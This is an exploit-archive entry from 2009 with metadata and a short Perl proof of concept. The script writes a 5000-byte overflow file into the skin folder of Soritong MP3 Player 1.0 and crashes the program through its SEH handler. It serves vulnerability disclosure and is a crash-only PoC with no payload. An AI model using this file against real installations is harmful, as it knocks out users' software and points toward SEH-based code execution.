Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)

Author: ThE g0bL!N
type: dos
platform: windows
port: 
date_added: 2009-07-16  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9192.pl  
#Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (Seh)
#First:http://milw0rm.com/exploits/8624
#By: ThE g0bL!N
my $crash="\x41" x 5000 ; # just random
open(myfile,'>>UI.txt') ;
print myfile $crash;
# Usage: After Clicking On file Perl Copy TXT File on this Diredtory skin\default\ Then Run The Program Boom !!!!!!! the Program Crashed
# Note : The Bug is Seh :)

# milw0rm.com [2009-07-17]